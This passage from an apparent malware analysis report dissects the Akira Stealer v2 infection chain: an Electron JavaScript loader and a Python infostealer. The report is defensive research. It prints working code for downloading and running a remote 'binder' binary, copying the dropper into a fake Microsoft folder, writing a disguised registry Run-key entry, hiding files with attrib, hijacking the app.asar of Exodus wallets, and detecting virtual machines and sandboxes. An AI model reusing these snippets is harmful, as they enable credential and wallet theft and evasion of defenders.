that mimics legitimate Windows components:",[1545,10005,10007],{"className":9007,"code":10006,"language":9009,"meta":863,"style":863},"%APPDATA%\\Microsoft\\Internet Explorer\\UserData\\Updater.exe\n",[1524,10008,10009],{"__ignoreMap":863},[1588,10010,10011,10013,10016,10018],{"class":1590,"line":1591},[1588,10012,2761],{"class":1770},[1588,10014,10015],{"class":1760},"APPDATA",[1588,10017,2761],{"class":1770},[1588,10019,10020],{"class":1778},"\\Microsoft\\Internet Explorer\\UserData\\Updater.exe\n",[806,10022,10023],{},"This location is intentionally chosen:",[2738,10025,10026,10029],{},[2741,10027,10028],{},"%APPDATA% is writable by regular users and doesn’t require administrative privileges.",[2741,10030,10031],{},"The directory name mimics legitimate Microsoft application folders, making it less suspicious.",[806,10033,10034],{},[1736,10035,10036],{},"Copy Mechanism:",[806,10038,10039],{},"The copy operation uses Node.js’s fs.copyFileSync() function:",[1545,10041,10043],{"className":9007,"code":10042,"language":9009,"meta":863,"style":863},"fs.copyFileSync(\n process.env.PORTABLE_EXECUTABLE_FILE,\n path.join(\n process.env.APPDATA,\n \"Microsoft\",\n \"Internet Explorer\",\n \"UserData\",\n \"Updater.exe\",\n ),\n);\n",[1524,10044,10045,10054,10064,10073,10082,10089,10096,10103,10110,10115],{"__ignoreMap":863},[1588,10046,10047,10049,10052],{"class":1590,"line":1591},[1588,10048,9749],{"class":1778},[1588,10050,10051],{"class":1756},"copyFileSync",[1588,10053,9031],{"class":1778},[1588,10055,10056,10059,10062],{"class":1590,"line":864},[1588,10057,10058],{"class":1778}," process.env.",[1588,10060,10061],{"class":1760},"PORTABLE_EXECUTABLE_FILE",[1588,10063,9061],{"class":1778},[1588,10065,10066,10069,10071],{"class":1590,"line":1814},[1588,10067,10068],{"class":1778}," path.",[1588,10070,9391],{"class":1756},[1588,10072,9031],{"class":1778},[1588,10074,10075,10078,10080],{"class":1590,"line":1831},[1588,10076,10077],{"class":1778}," process.env.",[1588,10079,10015],{"class":1760},[1588,10081,9061],{"class":1778},[1588,10083,10084,10087],{"class":1590,"line":2135},[1588,10085,10086],{"class":1774}," \"Microsoft\"",[1588,10088,9061],{"class":1778},[1588,10090,10091,10094],{"class":1590,"line":2141},[1588,10092,10093],{"class":1774}," \"Internet Explorer\"",[1588,10095,9061],{"class":1778},[1588,10097,10098,10101],{"class":1590,"line":2147},[1588,10099,10100],{"class":1774}," \"UserData\"",[1588,10102,9061],{"class":1778},[1588,10104,10105,10108],{"class":1590,"line":2153},[1588,10106,10107],{"class":1774}," \"Updater.exe\"",[1588,10109,9061],{"class":1778},[1588,10111,10112],{"class":1590,"line":2159},[1588,10113,10114],{"class":1778}," ),\n",[1588,10116,10117],{"class":1590,"line":2165},[1588,10118,2308],{"class":1778},[2738,10120,10121,10124],{},[2741,10122,10123],{},"PORTABLE_EXECUTABLE_FILE is an environment variable automatically set by many packers (such as Electron) to reference the path of the executing binary.",[2741,10125,10126],{},"path.join(...) builds a fully-qualified destination path across different operating systems.",[806,10128,10129],{},"This logic executes only if the file is not already present—thus acting as a self-repair mechanism to restore the dropper if deleted.",[806,10131,10132,10135],{},[1736,10133,10134],{},"Role in the Malware Chain","\nThe presence of this copied Updater.exe ensures that:",[2738,10137,10138,10141],{},[2741,10139,10140],{},"The loader can re-trigger itself across system reboots.",[2741,10142,10143],{},"The full infection chain (leading to main.exe, node.exe, and eventually astor.py) can re-initiate without relying on traditional registry persistence mechanisms, which are more likely to be monitored.",[1671,10145,10147],{"id":10146},"_626-optional-binder-execution","6.2.6 Optional Binder Execution",[806,10149,1677],{},[806,10151,10152,10153,10155],{},"In addition to downloading and executing the main stealer payload (",[1524,10154,6643],{},"), the decrypted JavaScript also contains logic to optionally download and launch a secondary executable referred to as the \"binder.\" This component can be used for persistence, distraction, or deployment of additional malware modules.",[806,10157,10158],{},[1736,10159,10160],{},"Conditional Execution",[806,10162,10163],{},"The binder logic is only activated if a specific flag is set:",[1545,10165,10167],{"className":9007,"code":10166,"language":9009,"meta":863,"style":863},"enableBinder = true;\n",[1524,10168,10169],{"__ignoreMap":863},[1588,10170,10171,10174,10176,10179],{"class":1590,"line":1591},[1588,10172,10173],{"class":1778},"enableBinder ",[1588,10175,9180],{"class":1770},[1588,10177,10178],{"class":1760}," true",[1588,10180,2849],{"class":1778},[806,10182,10183,10184,10187],{},"In the sample analyzed, this value was set to ",[1524,10185,10186],{},"false"," by default, but the logic remains embedded in the payload and can be trivially enabled in a different campaign or variant.",[806,10189,10190],{},[1736,10191,10192],{},"Binder Download Logic",[806,10194,10195,10196,10199],{},"If activated, the script attempts to fetch an external binary from a URL defined by the ",[1524,10197,10198],{},"%BINDERURL%"," placeholder:",[1545,10201,10203],{"className":9007,"code":10202,"language":9009,"meta":863,"style":863},"const fileUrl = \"%BINDERURL%\";\nconst fileResponse = await axios.get(fileUrl, { responseType: \"stream\" });\nconst writer = fs.createWriteStream(binderFile);\nfileResponse.data.pipe(writer);\n",[1524,10204,10205,10219,10239,10254],{"__ignoreMap":863},[1588,10206,10207,10209,10212,10214,10217],{"class":1590,"line":1591},[1588,10208,9016],{"class":1770},[1588,10210,10211],{"class":1760}," fileUrl",[1588,10213,9022],{"class":1770},[1588,10215,10216],{"class":1774}," \"%BINDERURL%\"",[1588,10218,2849],{"class":1778},[1588,10220,10221,10223,10225,10227,10229,10231,10233,10235,10237],{"class":1590,"line":864},[1588,10222,9016],{"class":1770},[1588,10224,9482],{"class":1760},[1588,10226,9022],{"class":1770},[1588,10228,9487],{"class":1770},[1588,10230,9490],{"class":1778},[1588,10232,9493],{"class":1756},[1588,10234,9496],{"class":1778},[1588,10236,9499],{"class":1774},[1588,10238,9502],{"class":1778},[1588,10240,10241,10243,10245,10247,10249,10251],{"class":1590,"line":1814},[1588,10242,9016],{"class":1770},[1588,10244,9520],{"class":1760},[1588,10246,9022],{"class":1770},[1588,10248,9525],{"class":1778},[1588,10250,9528],{"class":1756},[1588,10252,10253],{"class":1778},"(binderFile);\n",[1588,10255,10256,10258,10260],{"class":1590,"line":1831},[1588,10257,9536],{"class":1778},[1588,10259,9539],{"class":1756},[1588,10261,9542],{"class":1778},[2738,10263,10264,10269],{},[2741,10265,8620,10266,10268],{},[1524,10267,9370],{}," file is saved into the system's temporary directory.",[2741,10270,10271,10272,10274],{},"Like ",[1524,10273,8894],{},", the binary is downloaded using Axios in a streamed fashion to avoid loading the entire binary into memory.",[806,10276,10277],{},[1736,10278,10279],{},"Execution Strategy",[806,10281,10282,10283,10285],{},"After successful download, the script invokes the downloaded binary using ",[1524,10284,7144],{},", ensuring that it runs in a new shell context:",[1545,10287,10289],{"className":9007,"code":10288,"language":9009,"meta":863,"style":863},"exec(`start cmd /c start ${binderFile}`, ...);\n",[1524,10290,10291],{"__ignoreMap":863},[1588,10292,10293,10295,10297,10300,10303,10306,10308,10311],{"class":1590,"line":1591},[1588,10294,9928],{"class":1756},[1588,10296,2030],{"class":1778},[1588,10298,10299],{"class":1774},"`start cmd /c start ${",[1588,10301,10302],{"class":1778},"binderFile",[1588,10304,10305],{"class":1774},"}`",[1588,10307,2289],{"class":1778},[1588,10309,10310],{"class":1770},"...",[1588,10312,2308],{"class":1778},[806,10314,10315],{},"To increase reliability, the script includes retry logic:",[1545,10317,10319],{"className":9007,"code":10318,"language":9009,"meta":863,"style":863},"setTimeout(() => {\n exec(...);\n}, 5000);\n",[1524,10320,10321,10333,10344],{"__ignoreMap":863},[1588,10322,10323,10326,10329,10331],{"class":1590,"line":1591},[1588,10324,10325],{"class":1756},"setTimeout",[1588,10327,10328],{"class":1778},"(() ",[1588,10330,9801],{"class":1770},[1588,10332,9804],{"class":1778},[1588,10334,10335,10338,10340,10342],{"class":1590,"line":864},[1588,10336,10337],{"class":1756}," exec",[1588,10339,2030],{"class":1778},[1588,10341,10310],{"class":1770},[1588,10343,2308],{"class":1778},[1588,10345,10346,10349,10352],{"class":1590,"line":1814},[1588,10347,10348],{"class":1778},"}, ",[1588,10350,10351],{"class":1760},"5000",[1588,10353,2308],{"class":1778},[806,10355,10356],{},"This ensures that even if the initial execution fails (e.g., due to system load or race conditions), the malware will reattempt launching the binary after a short delay.",[806,10358,10359],{},[1736,10360,10361],{},"Use Cases for the Binder",[806,10363,10364],{},"While the exact purpose of the binder binary is not revealed in this particular sample (due to the placeholder URL), such components are commonly used to:",[2738,10366,10367,10370,10373,10376],{},[2741,10368,10369],{},"Reinstall or relaunch the primary malware components",[2741,10371,10372],{},"Display fake installers or decoy applications",[2741,10374,10375],{},"Deploy additional spyware, backdoors, or ransomware",[2741,10377,10378],{},"Modify system settings or disable security features",[810,10380,10382],{"id":10381},"_63-summary","6.3 Summary",[806,10384,1536],{},[806,10386,10387,10389],{},[1524,10388,8833],{}," is a highly obfuscated, encrypted JavaScript loader that uses industry-standard cryptography (PBKDF2 + AES-256-CBC) to protect its true purpose. Upon decryption, it operates as a fully capable second-stage loader that:",[2738,10391,10392,10397,10400,10405],{},[2741,10393,10394,10395,2772],{},"Retrieves further malware (",[1524,10396,8894],{},[2741,10398,10399],{},"Modifies payload behavior dynamically",[2741,10401,10402,10403,2772],{},"Launches the actual stealer script (",[1524,10404,6643],{},[2741,10406,10407,10408],{},"Reinforces persistence by restoring ",[1524,10409,6635],{},[806,10411,10412,10413,10416],{},"Its combination of encryption, dynamic execution, modular payload fetching, and fileless operation showcases a ",[1736,10414,10415],{},"highly advanced JavaScript-based malware architecture"," that leverages Node.js capabilities in an Electron shell.",[1511,10418,10420,10421,2772],{"id":10419},"_7-deepdive-akira-stealer-v2-astorpy","7. DeepDive: Akira Stealer v2 (",[1524,10422,6643],{},[806,10424,816],{},[810,10426,10428],{"id":10427},"_71-high-level-functionality","7.1. High-Level Functionality",[806,10430,1536],{},[806,10432,10433,10434,10436],{},"Akira Stealer v2 (",[1524,10435,6643],{},") is a multi-functional, modular infostealer malware written in Python. It is designed to exfiltrate a broad range of sensitive user data from both Chromium- and Firefox-based browsers, crypto wallets, communication clients (e.g., Discord, Telegram), and system files. It incorporates sophisticated anti-analysis mechanisms, registry-based persistence, clipboard hijacking, and memory injection techniques.",[810,10438,10440],{"id":10439},"_72-persistence-and-deployment","7.2 Persistence and Deployment",[806,10442,1536],{},[1671,10444,10446],{"id":10445},"_721-execution-chain-context","7.2.1 Execution Chain Context",[806,10448,1677],{},[806,10450,10451,10453],{},[1524,10452,6643],{}," is not executed standalone but is the final payload in a multi-stage attack chain:",[1545,10455,10459],{"className":10456,"code":10457,"language":10458,"meta":863,"style":863},"language-plaintext shiki shiki-themes github-light github-dark","Updater.exe\n └── main.exe (Electron app)\n └── cmd.exe\n └── python.exe astor.py\n","plaintext",[1524,10460,10461,10466,10471,10476],{"__ignoreMap":863},[1588,10462,10463],{"class":1590,"line":1591},[1588,10464,10465],{},"Updater.exe\n",[1588,10467,10468],{"class":1590,"line":864},[1588,10469,10470],{}," └── main.exe (Electron app)\n",[1588,10472,10473],{"class":1590,"line":1814},[1588,10474,10475],{}," └── cmd.exe\n",[1588,10477,10478],{"class":1590,"line":1831},[1588,10479,10480],{}," └── python.exe astor.py\n",[806,10482,10483,10484,10486],{},"This structured execution chain allows each stage to evade detection by delegating malicious functionality to the next. ",[1524,10485,6635],{}," initiates the sequence and is responsible for maintaining persistence.",[1671,10488,10490],{"id":10489},"_722-registry-based-persistence","7.2.2 Registry-Based Persistence",[806,10492,1677],{},[806,10494,10495,10496,10498],{},"Akira establishes persistence by writing a registry key under the current user’s Run path. This ensures that ",[1524,10497,6635],{}," is executed on each system startup:",[1545,10500,10504],{"className":10501,"code":10502,"language":10503,"meta":863,"style":863},"language-python shiki shiki-themes github-light github-dark","command = f'reg add HKCU\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run /v \"Realtek Audio\" /t REG_SZ /d \"{path}\\\\Updater.exe\" /f'\nos.system(command)\n","python",[1524,10505,10506,10511],{"__ignoreMap":863},[1588,10507,10508],{"class":1590,"line":1591},[1588,10509,10510],{},"command = f'reg add HKCU\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run /v \"Realtek Audio\" /t REG_SZ /d \"{path}\\\\Updater.exe\" /f'\n",[1588,10512,10513],{"class":1590,"line":864},[1588,10514,10515],{},"os.system(command)\n",[2738,10517,10518,10525,10533],{},[2741,10519,10520,2545,10523],{},[1736,10521,10522],{},"Path",[1524,10524,7686],{},[2741,10526,10527,2545,10530,10532],{},[1736,10528,10529],{},"Value name",[1524,10531,7694],{}," (chosen to appear benign)",[2741,10534,10535,10538,10539],{},[1736,10536,10537],{},"Payload path",": Typically in ",[1524,10540,10541],{},"AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\\\Updater.exe",[806,10543,10544,10545,10548],{},"This command silently writes the autorun entry via PowerShell or native ",[1524,10546,10547],{},"os.system()"," execution.",[1671,10550,10552],{"id":10551},"_723-file-concealment","7.2.3 File Concealment",[806,10554,1677],{},[806,10556,10557],{},"To further obscure the binary from users and simple AV scans, the file is marked with hidden and system attributes:",[1545,10559,10561],{"className":10501,"code":10560,"language":10503,"meta":863,"style":863},"subprocess.run([\"attrib\", \"+h\", \"+s\", destination_path])\n",[1524,10562,10563],{"__ignoreMap":863},[1588,10564,10565],{"class":1590,"line":1591},[1588,10566,10560],{},[2738,10568,10569,10575],{},[2741,10570,10571,10574],{},[1524,10572,10573],{},"+h",": Marks the file as hidden",[2741,10576,10577,10580],{},[1524,10578,10579],{},"+s",": Marks the file as a protected system file",[806,10582,10583],{},"This effectively removes the file from standard Windows Explorer views and increases stealth.",[1671,10585,10587],{"id":10586},"_724-reinfection-techniques","7.2.4 Reinfection Techniques",[806,10589,1677],{},[806,10591,10592,10593,10595,10596,2289,10599,10602],{},"The malware supports self-replication and reinfection through Electron application hijacking. Specifically, it replaces the ",[1524,10594,7089],{}," archive in Electron-based desktop wallets (e.g., ",[1736,10597,10598],{},"Exodus",[1736,10600,10601],{},"Atomic Wallet",") to execute malicious JavaScript during legitimate app startup.",[806,10604,10605],{},"The logic looks for known wallet app paths:",[1545,10607,10609],{"className":10501,"code":10608,"language":10503,"meta":863,"style":863},"path = os.getenv(\"APPDATA\") + \"\\\\Exodus\\\\resources\\\\app.asar\"\n",[1524,10610,10611],{"__ignoreMap":863},[1588,10612,10613],{"class":1590,"line":1591},[1588,10614,10608],{},[806,10616,10617,10618,2786],{},"If the target file exists, it is overwritten with a weaponized archive. This ensures persistence even after manual cleanup of ",[1524,10619,6635],{},[810,10621,10623,10624,2772],{"id":10622},"_73-anti-analysis-evasion-class-vmprotect","7.3 Anti-Analysis / Evasion (Class: ",[1524,10625,10626],{},"VmProtect",[806,10628,1536],{},[1671,10630,10632],{"id":10631},"_731-introduction","7.3.1 Introduction",[806,10634,1677],{},[806,10636,10637,10638,10640,10641,10643],{},"In modern malware campaigns, evading analysis in virtualized and sandboxed environments is critical to maintain stealth. The ",[4655,10639,6704],{}," implements a comprehensive VM/sandbox detection module (",[1524,10642,10626],{},") that aggressively identifies and aborts execution under analyst-controlled environments. This report dissects each detection technique, provides the exact code snippets—including complete blacklist definitions—and outlines the analysis methodology used.",[1671,10645,10647],{"id":10646},"_732-overview","7.3.2 Overview",[806,10649,1677],{},[806,10651,8620,10652,10654],{},[1524,10653,10626],{}," class implements robust VM and sandbox detection to prematurely abort execution in analysis environments. It supports two detection levels:",[2738,10656,10657,10663],{},[2741,10658,10659,10662],{},[1736,10660,10661],{},"Level 1",": Lightweight, fast checks",[2741,10664,10665,10668],{},[1736,10666,10667],{},"Level 2",": In-depth, comprehensive probes",[806,10670,10671,10672,10675,10676,10679,10680,10683],{},"If ",[1524,10673,10674],{},"VmProtect.isVM(level)"," returns ",[1524,10677,10678],{},"True",", the malware calls ",[1524,10681,10682],{},"sys.exit()",", preventing further analysis.",[1671,10685,10687],{"id":10686},"_733-detection-levels","7.3.3 Detection Levels",[806,10689,1677],{},[1902,10691,1905,10693],{"style":10692},"width:100%; border-collapse: collapse;",[1923,10694,10695,1905,10705,1905,10715,1905,10725,1905,10734,1905,10744,1905,10753,1905,10762],{},[1911,10696,1909,10697,1909,10700,1909,10703,1905],{},[1915,10698,10699],{},"Feature",[1915,10701,10661],{"style":10702},"text-align: center;",[1915,10704,10667],{"style":10702},[1911,10706,1909,10707,1909,10710,1909,10713,1905],{},[1928,10708,10709],{},"HTTPSimulation",[1928,10711,10712],{"style":10702},"✔️",[1928,10714,10712],{"style":10702},[1911,10716,1909,10718,1909,10721,1909,10723,1905],{"style":10717},"background-color: #f5f5f5;",[1928,10719,10720],{},"Computer-name blacklist",[1928,10722,10712],{"style":10702},[1928,10724,10712],{"style":10702},[1911,10726,1909,10727,1909,10730,1909,10732,1905],{},[1928,10728,10729],{},"User-account blacklist",[1928,10731,10712],{"style":10702},[1928,10733,10712],{"style":10702},[1911,10735,1909,10736,1909,10739,1909,10742,1905],{"style":10717},[1928,10737,10738],{},"Hardware-UUID blacklist",[1928,10740,10741],{"style":10702},"❌",[1928,10743,10712],{"style":10702},[1911,10745,1909,10746,1909,10749,1909,10751,1905],{},[1928,10747,10748],{},"Public-hosting API check",[1928,10750,10741],{"style":10702},[1928,10752,10712],{"style":10702},[1911,10754,1909,10755,1909,10758,1909,10760,1905],{"style":10717},[1928,10756,10757],{},"Registry & GPU hints",[1928,10759,10741],{"style":10702},[1928,10761,10712],{"style":10702},[1911,10763,1909,10764,1909,10767,1909,10769,1905],{},[1928,10765,10766],{},"Task-killing background",[1928,10768,10712],{"style":10702},[1928,10770,10712],{"style":10702},[1541,10772],{"className":10773},[6875,6876],[1671,10775,10777,10778,10780],{"id":10776},"_734-vmprotect-architecture","7.3.4 ",[1524,10779,10626],{}," Architecture",[806,10782,1677],{},[806,10784,8620,10785,10787],{},[1524,10786,10626],{}," class exposes the following primary methods:",[2738,10789,10790,10797,10804,10811,10818,10825,10832,10839],{},[2741,10791,10792],{},[1736,10793,10794],{},[1524,10795,10796],{},"checkUUID()",[2741,10798,10799],{},[1736,10800,10801],{},[1524,10802,10803],{},"checkComputerName()",[2741,10805,10806],{},[1736,10807,10808],{},[1524,10809,10810],{},"checkUsers()",[2741,10812,10813],{},[1736,10814,10815],{},[1524,10816,10817],{},"checkHosting()",[2741,10819,10820],{},[1736,10821,10822],{},[1524,10823,10824],{},"checkHTTPSimulation()",[2741,10826,10827],{},[1736,10828,10829],{},[1524,10830,10831],{},"checkRegistry()",[2741,10833,10834],{},[1736,10835,10836],{},[1524,10837,10838],{},"killTasks()",[2741,10840,10841],{},[1736,10842,10843],{},[1524,10844,10845],{},"isVM(level)",[806,10847,10848,10849,10852],{},"Each method returns a boolean or executes evasion steps. The ",[1524,10850,10851],{},"isVM"," wrapper aggregates these checks based on the specified level.",[1902,10854,1905,10855],{"style":10692},[1923,10856,10857,1905,10869,1905,10883,1905,10897,1905,10910,1905,10923,1905,10936,1905,10949,1905,10964],{},[1911,10858,1909,10859,1909,10863,1909,10866,1905],{},[1915,10860,10862],{"style":10861},"text-align: left;","Method",[1915,10864,10865],{"style":10861},"Triggered By",[1915,10867,10868],{"style":10861},"Description",[1911,10870,1909,10871,1909,10875,1909,10880,1905],{},[1928,10872,10873],{},[1524,10874,10796],{},[1928,10876,10877],{},[1524,10878,10879],{},"isVM(2)",[1928,10881,10882],{},"WMI UUID blacklist",[1911,10884,1909,10885,1909,10889,1909,10894,1905],{"style":10717},[1928,10886,10887],{},[1524,10888,10803],{},[1928,10890,10891],{},[1524,10892,10893],{},"isVM(1,2)",[1928,10895,10896],{},"Environment hostname match",[1911,10898,1909,10899,1909,10903,1909,10907,1905],{},[1928,10900,10901],{},[1524,10902,10810],{},[1928,10904,10905],{},[1524,10906,10893],{},[1928,10908,10909],{},"Username blacklist",[1911,10911,1909,10912,1909,10916,1909,10920,1905],{"style":10717},[1928,10913,10914],{},[1524,10915,10817],{},[1928,10917,10918],{},[1524,10919,10879],{},[1928,10921,10922],{},"IP hosting provider check via ip-api.com",[1911,10924,1909,10925,1909,10929,1909,10933,1905],{},[1928,10926,10927],{},[1524,10928,10824],{},[1928,10930,10931],{},[1524,10932,10893],{},[1928,10934,10935],{},"HTTPS interception detection",[1911,10937,1909,10938,1909,10942,1909,10946,1905],{"style":10717},[1928,10939,10940],{},[1524,10941,10831],{},[1928,10943,10944],{},[1524,10945,10879],{},[1928,10947,10948],{},"Registry & GPU driver artifacts",[1911,10950,1909,10951,1909,10955,1909,10961,1905],{},[1928,10952,10953],{},[1524,10954,10838],{},[1928,10956,10957,10960],{},[1524,10958,10959],{},"isVM(...)"," spawn",[1928,10962,10963],{},"Terminates known analysis processes",[1911,10965,1909,10966,1909,10970,1909,10973,1905],{"style":10717},[1928,10967,10968],{},[1524,10969,10845],{},[1928,10971,10972],{},"init",[1928,10974,10975,10976,10978],{},"Aggregates checks and calls ",[1524,10977,10838],{}," thread",[1541,10980],{"className":10981},[6875,6876],[1545,10983,10985],{"className":10501,"code":10984,"language":10503,"meta":863,"style":863},"@staticmethod\ndef isVM(level: int) -> bool:\n # Always start background task-killer\n Thread(target=VmProtect.killTasks, daemon=True).start()\n if level == 1:\n # Fast path: HTTPS, hostname & user\n return (\n VmProtect.checkHTTPSimulation()\n or VmProtect.checkComputerName()\n or VmProtect.checkUsers()\n )\n if level == 2:\n # Deep scan: includes UUID, hosting, registry & GPU\n try:\n return (\n VmProtect.checkHTTPSimulation()\n or VmProtect.checkUUID()\n or VmProtect.checkComputerName()\n or VmProtect.checkUsers()\n or VmProtect.checkHosting()\n or VmProtect.checkRegistry()\n )\n except:\n return False\n return False\n",[1524,10986,10987,10992,10997,11002,11007,11012,11017,11022,11027,11032,11037,11043,11049,11055,11061,11067,11073,11079,11085,11091,11097,11103,11109,11115,11121],{"__ignoreMap":863},[1588,10988,10989],{"class":1590,"line":1591},[1588,10990,10991],{},"@staticmethod\n",[1588,10993,10994],{"class":1590,"line":864},[1588,10995,10996],{},"def isVM(level: int) -> bool:\n",[1588,10998,10999],{"class":1590,"line":1814},[1588,11000,11001],{}," # Always start background task-killer\n",[1588,11003,11004],{"class":1590,"line":1831},[1588,11005,11006],{}," Thread(target=VmProtect.killTasks, daemon=True).start()\n",[1588,11008,11009],{"class":1590,"line":2135},[1588,11010,11011],{}," if level == 1:\n",[1588,11013,11014],{"class":1590,"line":2141},[1588,11015,11016],{}," # Fast path: HTTPS, hostname & user\n",[1588,11018,11019],{"class":1590,"line":2147},[1588,11020,11021],{}," return (\n",[1588,11023,11024],{"class":1590,"line":2153},[1588,11025,11026],{}," VmProtect.checkHTTPSimulation()\n",[1588,11028,11029],{"class":1590,"line":2159},[1588,11030,11031],{}," or VmProtect.checkComputerName()\n",[1588,11033,11034],{"class":1590,"line":2165},[1588,11035,11036],{}," or VmProtect.checkUsers()\n",[1588,11038,11040],{"class":1590,"line":11039},11,[1588,11041,11042],{}," )\n",[1588,11044,11046],{"class":1590,"line":11045},12,[1588,11047,11048],{}," if level == 2:\n",[1588,11050,11052],{"class":1590,"line":11051},13,[1588,11053,11054],{}," # Deep scan: includes UUID, hosting, registry & GPU\n",[1588,11056,11058],{"class":1590,"line":11057},14,[1588,11059,11060],{}," try:\n",[1588,11062,11064],{"class":1590,"line":11063},15,[1588,11065,11066],{}," return (\n",[1588,11068,11070],{"class":1590,"line":11069},16,[1588,11071,11072],{}," VmProtect.checkHTTPSimulation()\n",[1588,11074,11076],{"class":1590,"line":11075},17,[1588,11077,11078],{}," or VmProtect.checkUUID()\n",[1588,11080,11082],{"class":1590,"line":11081},18,[1588,11083,11084],{}," or VmProtect.checkComputerName()\n",[1588,11086,11088],{"class":1590,"line":11087},19,[1588,11089,11090],{}," or VmProtect.checkUsers()\n",[1588,11092,11094],{"class":1590,"line":11093},20,[1588,11095,11096],{}," or VmProtect.checkHosting()\n",[1588,11098,11100],{"class":1590,"line":11099},21,[1588,11101,11102],{}," or VmProtect.checkRegistry()\n",[1588,11104,11106],{"class":1590,"line":11105},22,[1588,11107,11108],{}," )\n",[1588,11110,11112],{"class":1590,"line":11111},23,[1588,11113,11114],{}," except:\n",[1588,11116,11118],{"class":1590,"line":11117},24,[1588,11119,11120],{}," return False\n",[1588,11122,11124],{"class":1590,"line":11123},25,[1588,11125,11126],{}," return False\n",[1671,11128,11130],{"id":11129},"_735-uuid-check-identifying-virtual-machines-via-hardware-uuid","7.3.5 UUID Check – Identifying Virtual Machines via Hardware UUID",[806,11132,1677],{},[806,11134,11135],{},"A common tactic in malware evasion is fingerprinting the underlying hardware environment. One of the earliest identifiers that can signal a virtual machine is the system UUID (Universally Unique Identifier). Virtualization platforms like VMware and VirtualBox often generate predictable or reused UUIDs, which can be used by malware to infer whether it is running in a virtualized or sandboxed environment.",[1545,11137,11139],{"className":10501,"code":11138,"language":10503,"meta":863,"style":863},"@staticmethod\ndef checkUUID() -> bool:\n try:\n raw = subprocess.run(\n \"wmic csproduct get uuid\", shell=True,\n capture_output=True\n ).stdout.splitlines()[2].decode().strip()\n except:\n raw = \"\"\n return raw in VmProtect.BLACKLISTED_UUIDS\n",[1524,11140,11141,11145,11150,11155,11160,11165,11170,11175,11180,11185],{"__ignoreMap":863},[1588,11142,11143],{"class":1590,"line":1591},[1588,11144,10991],{},[1588,11146,11147],{"class":1590,"line":864},[1588,11148,11149],{},"def checkUUID() -> bool:\n",[1588,11151,11152],{"class":1590,"line":1814},[1588,11153,11154],{}," try:\n",[1588,11156,11157],{"class":1590,"line":1831},[1588,11158,11159],{}," raw = subprocess.run(\n",[1588,11161,11162],{"class":1590,"line":2135},[1588,11163,11164],{}," \"wmic csproduct get uuid\", shell=True,\n",[1588,11166,11167],{"class":1590,"line":2141},[1588,11168,11169],{}," capture_output=True\n",[1588,11171,11172],{"class":1590,"line":2147},[1588,11173,11174],{}," ).stdout.splitlines()[2].decode().strip()\n",[1588,11176,11177],{"class":1590,"line":2153},[1588,11178,11179],{}," except:\n",[1588,11181,11182],{"class":1590,"line":2159},[1588,11183,11184],{}," raw = \"\"\n",[1588,11186,11187],{"class":1590,"line":2165},[1588,11188,11189],{}," return raw in VmProtect.BLACKLISTED_UUIDS\n",[806,11191,11192],{},"This check leverages the Windows Management Instrumentation Command-line (WMIC) tool to extract the UUID of the host machine. The returned value is then cross-checked against a curated list of UUIDs that are commonly associated with virtual machine templates or known analysis setups.",[1671,11194,11196],{"id":11195},"_736-computer-name-check-detecting-sandbox-and-analysis-environments-via-hostname","7.3.6 Computer Name Check – Detecting Sandbox and Analysis Environments via Hostname",[806,11198,1677],{},[806,11200,11201,11202,11205],{},"The system hostname, accessed via the ",[1524,11203,11204],{},"%COMPUTERNAME%"," environment variable, often reveals clues about its environment. Analysts frequently use default or quickly-generated hostnames like \"DESKTOP-XXXXXXX\", \"WIN10ANALYSIS\", or even names linked to their internal environments. Malware takes advantage of this by comparing the system's hostname against a blacklist.",[1545,11207,11209],{"className":10501,"code":11208,"language":10503,"meta":863,"style":863},"@staticmethod\ndef checkComputerName() -> bool:\n name = os.getenv(\"computername\", \"\").lower()\n return name in VmProtect.BLACKLISTED_COMPUTERNAMES\n\nBLACKLISTED_COMPUTERNAMES = (\n '00900bc83802','bee7370c-8c0c-4','desktop-nakffmt',\n 'desktop-vkeons4','ntt-eff-2w11wss',\n # ... dozens more entries ...\n)\n",[1524,11210,11211,11215,11220,11225,11230,11234,11239,11244,11249,11254],{"__ignoreMap":863},[1588,11212,11213],{"class":1590,"line":1591},[1588,11214,10991],{},[1588,11216,11217],{"class":1590,"line":864},[1588,11218,11219],{},"def checkComputerName() -> bool:\n",[1588,11221,11222],{"class":1590,"line":1814},[1588,11223,11224],{}," name = os.getenv(\"computername\", \"\").lower()\n",[1588,11226,11227],{"class":1590,"line":1831},[1588,11228,11229],{}," return name in VmProtect.BLACKLISTED_COMPUTERNAMES\n",[1588,11231,11232],{"class":1590,"line":2135},[1588,11233,9865],{"emptyLinePlaceholder":508},[1588,11235,11236],{"class":1590,"line":2141},[1588,11237,11238],{},"BLACKLISTED_COMPUTERNAMES = (\n",[1588,11240,11241],{"class":1590,"line":2147},[1588,11242,11243],{}," '00900bc83802','bee7370c-8c0c-4','desktop-nakffmt',\n",[1588,11245,11246],{"class":1590,"line":2153},[1588,11247,11248],{}," 'desktop-vkeons4','ntt-eff-2w11wss',\n",[1588,11250,11251],{"class":1590,"line":2159},[1588,11252,11253],{}," # ... dozens more entries ...\n",[1588,11255,11256],{"class":1590,"line":2165},[1588,11257,11258],{},")\n",[806,11260,11261],{},"If a match is found, the malware may choose to halt execution or deploy a fake payload, thereby avoiding full behavioral analysis.",[1671,11263,11265],{"id":11264},"_737-user-account-check-profiling-analyst-or-default-accounts","7.3.7 User Account Check – Profiling Analyst or Default Accounts",[806,11267,1677],{},[806,11269,11270],{},"Another heuristic involves evaluating the username under which the malware is executed. Many virtual machine templates and sandboxes reuse common usernames such as \"Abby\", \"Test\", or \"wdagutilityaccount\". These names are low-entropy and often hardcoded in open source sandbox environments.",[1545,11272,11274],{"className":10501,"code":11273,"language":10503,"meta":863,"style":863},"@staticmethod\ndef checkUsers() -> bool:\n user = os.getlogin().lower()\n return user in VmProtect.BLACKLISTED_USERS\n\nBLACKLISTED_USERS = (\n 'wdagutilityaccount','abby','peter wilson','hmarc',\n 'a.monaldo','tvm',\n # ... 30+ more entries ...\n)\n",[1524,11275,11276,11280,11285,11290,11295,11299,11304,11309,11314,11319],{"__ignoreMap":863},[1588,11277,11278],{"class":1590,"line":1591},[1588,11279,10991],{},[1588,11281,11282],{"class":1590,"line":864},[1588,11283,11284],{},"def checkUsers() -> bool:\n",[1588,11286,11287],{"class":1590,"line":1814},[1588,11288,11289],{}," user = os.getlogin().lower()\n",[1588,11291,11292],{"class":1590,"line":1831},[1588,11293,11294],{}," return user in 